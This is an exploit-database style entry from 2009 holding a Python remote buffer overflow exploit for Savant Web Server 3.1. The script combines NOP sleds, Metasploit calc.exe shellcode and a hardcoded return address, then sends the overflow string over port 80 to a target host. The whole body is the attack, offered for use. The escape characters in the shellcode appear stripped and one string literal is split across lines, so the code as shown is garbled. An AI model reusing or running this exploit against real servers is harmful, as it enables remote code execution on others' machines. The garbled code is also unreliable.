Savant Web Server 3.1 Remote Buffer Overflow Exploit :

Date : 2009-12-14 Author : DouBle_Zer0
#!/usr/bin/python

#Title: Savant web server 3.1 buffer overflow exploit
#Author: DouBle_Zer0 
#Version: 3.1
#Tested on: win xp sp2,3 [en]
#Vulnerability discovered by Muts(offensive security)
#x83xc4x50x54xc3 -add esp,50 push esp ret[see the double dance of this in exploit]
#ret=00401D09[pop ebp, ret]


import socket,sys
# win calc.exe [metasploit] (172 byte)
host = sys.argv[1] 
buff = ("x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8"
"x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1"
"xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07"
"xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25"
"x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5"
"x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d"
"x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4"
"xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0"
"xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c"
"x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b"
"x27x41x13x88xbbx0cx17x9cxbdx22x72xe4")
buff3 = "x90" * 30
buff2 = "x90" * 53
ret =   "x09x1Dx40" #savant.exe 
buffr = 'x83xC4x50x54xc3 /' +buff2+buff3+buff+ret + '

'
print buffr
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,80))
s.send(buffr)
sys.exit()

C1

 

C2

 

C3